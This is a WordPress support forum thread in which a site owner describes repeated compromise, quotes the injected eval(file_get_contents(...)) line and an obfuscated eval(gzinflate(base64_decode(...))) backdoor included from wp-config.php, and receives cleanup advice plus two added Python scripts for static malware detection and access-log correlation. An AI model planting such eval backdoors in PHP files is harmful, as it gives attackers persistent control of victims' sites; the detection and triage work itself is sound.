    For some reason, my index.php in my root folder seems to keep getting compromised. I found last week that within the file there had been a link to a viagra file in the main directory. I fixed this, changed passwords, etc. and upgraded WP, but it has happened again! The following was in my index.php file:

    eval(file_get_contents("/home/wrestlin/public_html/js/751b80d2ef316f0a050bbc2867bc028f"));

    the file in question was littered with viagra text.

    I have no spyware or anything like this on my machine, and the passwords are changed regularly. Only one other person has access to FTP, but surely it’s not him and it shows ME as the owner of both of these files in terms of modifying etc.

    I have looked at the index.php file and it says modified 29/01/2010 and the viagra file in question was uploaded today.

    I don’t know what to do. I’ve done anything I know in terms of security, passwords, etc. but it keeps happening, and it has also destroyed my search engine credibility.

Viewing 10 replies - 16 through 25 (of 25 total)
    Are you using Bad Behavior and Spam Karma?

    Sounds to me like your server has a rootkit installed.

    Is this your server? or is this on a host provider?

    Thread Starter amishpatel

    (@amishpatel)

    Not sure what a rootkit is..

    This is my dedicated server, hosted with gigenet.

    Not using Bad Behavior or Spam Karma.. but I'm guessing if the other plugins can't stop this, then they may be similar.

    Thread Starter amishpatel

    (@amishpatel)

    OK, not sure if I found the problem or not. I was looking in my wp-config.php file and found the following at the end, which was different to the normal template:

    /**
     * Retrieve the name of the highest priority template file that exists.
     *
     * Searches in the STYLESHEETPATH before TEMPLATEPATH so that themes which
     * inherit from a parent theme can just overload one file.
     *
     * @since 2.7.0 */
    include_once('wp-template.php');
    
    ?>

    I went to wp-template.php in my blog folder and it had the following crap:

    <?
    eval(gzinflate(base64_decode('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 ovYJS46i3xfp2/P3YdRvR1uRg2POZq/+mKWj6PjgiHQ2X6Tv5umrdxevQ6S3zeEpzt/8OTtfzEfRyVeCA/4DQG5OH0xXJELov1H9+DvsPdf1V8O85G1e9RC2Xf8D')));
    ?>

    Deleted the lines out of the config file and the template file, but still not sure if this will be enough, or if it was the backdoor in question..

    Thread Starter amishpatel

    (@amishpatel)

    I am going to do another clean and sweep of the DB tonight, but in the meantime I’m stumped again.

    I have cleaned and gone over my site searching for traces of the keywords ‘viagra’ and ‘base_64’, ran exploit scanner, checked config, settings, theme files etc., which is where the hacks usually are, and found nothing. Also checked .htaccess and went through files/folders for malicious files, but no luck.

    However, this is the first time I’ve removed everything and google is STILL caching my website as a viagra site. See: https://www.google.co.uk/search?hl=en&source=hp&q=wrestling-edge&btnG=Google+Search&meta=&aq=f&oq=

    I even made the files that are constantly getting hacked, immutable.

    Does anyone have any clue? I can’t see any clues in the source code of the cached viagra website either.

    I’m so sick of this.

    Have you ever found any php files tucked away deep, like in your uploads folder, or even somewhere else on your server? I mentioned looking for rogue files earlier in the thread…never really heard back from you on the result.

    This talks about how I cleaned my install:
    https://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

    And here is a different post I just made for someone specifically, but it goes a bit more in depth about using your access logs to find and delete php files that don’t belong:
    https://www.rvoodoo.com/2010/03/using-access-logs-to-find-rogue-files-when-wordpress-is-hacked/
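    The two constructs quoted earlier in this thread, the `eval(file_get_contents(...))` line in index.php and the `eval(gzinflate(base64_decode('...')))` line in wp-template.php that wp-config.php was made to include, can be hunted for statically, which also covers the rogue-file search RVoodoo describes. The following Python script is an added example written for this page, not code from the thread, from RVoodoo's posts or from WordPress. It builds a constructed, inert copy of the three files in a temporary directory (the blob it decodes only echoes text, and the index.php path is a placeholder), flags the patterns without executing anything, decodes the inflated blob with zlib instead of eval so you can read the payload, and records both mtime and ctime for each hit, since mtime can be back-dated with touch/utime but ctime is set by the kernel and cannot be rewritten from userland.

```python
import base64
import os
import re
import tempfile
import zlib
from datetime import datetime, timezone

# Constructs flagged in the thread: eval over a fetched file, and eval over an
# inflated base64 blob. Matching is static; nothing found is ever executed.
EVAL_FILE_RX = re.compile(r"eval\s*\(\s*file_get_contents\s*\(", re.I)
EVAL_INFLATE_RX = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.I)
# Any include/require in wp-config.php; a stock config only pulls in wp-settings.php.
CONFIG_INCLUDE_RX = re.compile(
    r"(?:include|require)(?:_once)?\b[^;]*?['\"]([^'\"]+\.php)['\"]", re.I)
STOCK_CONFIG_INCLUDES = {"wp-settings.php"}


def decode_gzinflate_payload(b64: str) -> str:
    """Decode PHP's base64_decode + gzinflate pair offline (raw DEFLATE, wbits=-15)."""
    return zlib.decompress(base64.b64decode(b64), -15).decode("utf-8", errors="replace")


def _stamp(ts: float) -> str:
    return datetime.fromtimestamp(ts, timezone.utc).isoformat(timespec="seconds")


def scan_php_tree(root: str) -> list:
    """Walk `root` and return one finding dict per suspicious construct in a .php file."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            st = os.stat(path)
            reasons = []
            if EVAL_FILE_RX.search(text):
                reasons.append(("eval of file_get_contents", None))
            m = EVAL_INFLATE_RX.search(text)
            if m:
                try:
                    decoded = decode_gzinflate_payload(m.group(1))
                except (ValueError, zlib.error) as exc:
                    decoded = f"<undecodable: {exc}>"
                reasons.append(("eval of gzinflate(base64_decode())", decoded))
            if name == "wp-config.php":
                for target in CONFIG_INCLUDE_RX.findall(text):
                    if os.path.basename(target) not in STOCK_CONFIG_INCLUDES:
                        reasons.append((f"non-stock include in wp-config.php: {target}", None))
            for reason, decoded in reasons:
                findings.append({
                    "path": os.path.relpath(path, root),
                    "reason": reason,
                    "decoded": decoded,
                    # mtime is settable with touch/utime, so an old value proves little;
                    # ctime is kernel-maintained, so "old mtime, fresh ctime" is a signal.
                    "mtime": _stamp(st.st_mtime),
                    "ctime": _stamp(st.st_ctime),
                    "mtime_backdated": st.st_ctime - st.st_mtime > 86400,
                })
    return findings


def build_sample_site() -> str:
    """Write a constructed, inert imitation of the thread's three files into a temp dir."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    # Constructed payload: stands in for an attacker's blob, but only echoes a string.
    comp = zlib.compressobj(level=9, wbits=-15)
    blob = base64.b64encode(
        comp.compress(b"<?php echo 'constructed payload'; ?>") + comp.flush()).decode()
    files = {
        "index.php": "<?php\n/* placeholder path, not the one from the thread */\n"
                     'eval(file_get_contents("/PLACEHOLDER/public_html/js/dropped_file"));\n',
        "wp-template.php": f"<?\neval(gzinflate(base64_decode('{blob}')));\n?>\n",
        "wp-config.php": "<?php\ndefine('DB_NAME', 'x');\n"
                         "require_once(ABSPATH . 'wp-settings.php');\n"
                         "include_once('wp-template.php');\n?>\n",
        os.path.join("wp-content", "uploads", "clean.php"): "<?php echo 'nothing to see'; ?>\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    # Mimic the back-dated modification time reported in the thread (30 days ago).
    old = datetime.now(timezone.utc).timestamp() - 30 * 86400
    os.utime(os.path.join(root, "wp-template.php"), (old, old))
    return root


if __name__ == "__main__":
    for f in scan_php_tree(build_sample_site()):
        print(f"{f['path']}: {f['reason']}  mtime={f['mtime']} ctime={f['ctime']} "
              f"backdated={f['mtime_backdated']}")
        if f["decoded"]:
            print("  decoded payload:", f["decoded"].strip())
```

    Point `scan_php_tree()` at a copy of the real document root rather than the sample, and treat every finding as a lead to read by hand: the decoded text is shown, never run, and a fresh ctime behind an old mtime is exactly the "magically appears with a date in the past" behaviour the thread starter describes.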

    Thread Starter amishpatel

    (@amishpatel)

    Hi RVoodoo,

    I’ve checked all folders for trace of rogue files… I probably need to do it thoroughly again, but I deleted anything suspicious or anything I didn't use. I pretty much deleted ANYTHING that was redundant on the website..

    Access logs and error logs haven’t really given me any information at all unfortunately.

    Can’t believe how long this has gone on and it’s really hurt my traffic.

    So… when your file was altered, and you checked the access logs for activity to the altered file at the exact time shown by the timestamp of the altered file, what did it show?

    Not the IP address, but the whole line, especially the second url/path that may be referenced at the end of the entry?
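    What RVoodoo is asking for here, the whole access-log line around the moment a file changed, with attention to the path and the referer at the end of the entry, can be scripted. This Python example is added for this page and is not code from the thread or from RVoodoo's posts. The Apache combined-format log lines and the change timestamp it correlates against are constructed, and the set of core WordPress PHP entry points it treats as expected is a starting allowlist for your own install, not a complete one.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" log format. The referer group is the "second url/path at the end"
# of the entry that the thread points at.
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample lines (RFC 5737 documentation addresses), not from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Mar/2010:03:14:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Mar/2010:03:14:40 +0000] "POST /wp-content/uploads/2010/01/image.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"
198.51.100.9 - - [05/Mar/2010:03:14:41 +0000] "GET /wp-template.php HTTP/1.1" 200 87 "http://example.invalid/panel" "Mozilla/4.0"
203.0.113.7 - - [05/Mar/2010:03:20:00 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Mar/2010:03:21:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 20 "http://example.invalid/wp-admin/" "Mozilla/5.0"
"""

# Constructed: the ctime of the tampered file, standing in for the thread's real value.
CHANGED_AT = datetime(2010, 3, 5, 3, 14, 41, tzinfo=timezone.utc)

# PHP files a stock WordPress install legitimately serves from the web root.
# Starting allowlist only; extend it for your own install.
ROOT_ENTRY_POINTS = {
    "/index.php", "/wp-login.php", "/wp-cron.php", "/xmlrpc.php",
    "/wp-comments-post.php", "/wp-trackback.php", "/wp-signup.php",
}
CORE_PREFIXES = ("/wp-admin/", "/wp-includes/")


def parse_log(text: str) -> list:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RX.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["file"] = e["path"].split("?", 1)[0]   # drop the query string
        entries.append(e)
    return entries


def requests_near(entries: list, when: datetime, window_seconds: int = 120) -> list:
    """Every request within +/- window_seconds of `when`, e.g. the altered file's ctime."""
    window = timedelta(seconds=window_seconds)
    return [e for e in entries if abs(e["ts"] - when) <= window]


def rogue_php_hits(entries: list) -> list:
    """Requests for .php files outside the core tree and the root allowlist.
    A .php hit under wp-content/uploads is always flagged: that directory holds media."""
    hits = []
    for e in entries:
        f = e["file"]
        if not f.endswith(".php"):
            continue
        if f.startswith("/wp-content/uploads/"):
            e["why"] = "php executed from uploads directory"
        elif f.startswith(CORE_PREFIXES) or f in ROOT_ENTRY_POINTS:
            continue
        else:
            e["why"] = "php outside core tree and root allowlist"
        hits.append(e)
    return hits


def format_entry(e: dict) -> str:
    return (f'{e["ts"].isoformat()} {e["ip"]} {e["method"]} {e["path"]} '
            f'{e["status"]} referer={e["referer"]!r} ua={e["ua"]!r}')


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    print("requests around the change:")
    for e in requests_near(log, CHANGED_AT, 60):
        print("  " + format_entry(e))
    print("php requests worth reviewing:")
    for e in rogue_php_hits(log):
        print(f'  [{e["why"]}] ' + format_entry(e))
```

    Feed `parse_log()` the real access_log and use the file's ctime, not its mtime, for `CHANGED_AT`: the thread starter notes that modified dates never line up with the log, which is what you would expect when the attacker back-dates mtime, whereas ctime cannot be set that way.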

    Did you run this one on your local workstation and on the friends workstation?
    https://www.malwarebytes.org/

    Thread Starter amishpatel

    (@amishpatel)

    henkholland – yes, our computers are malware free.

    RVoodoo.. generally these files magically appear on the server, but their last modified date is in the past. FTP logs show nothing apart from my IP editing a bunch of files. It has no useful information in there. Modified dates never match up against access_logs either.. it’s hopeless. I’ve tried that method.

    The topic ‘WordPress Keeps Being Hacked!’ is closed to new replies.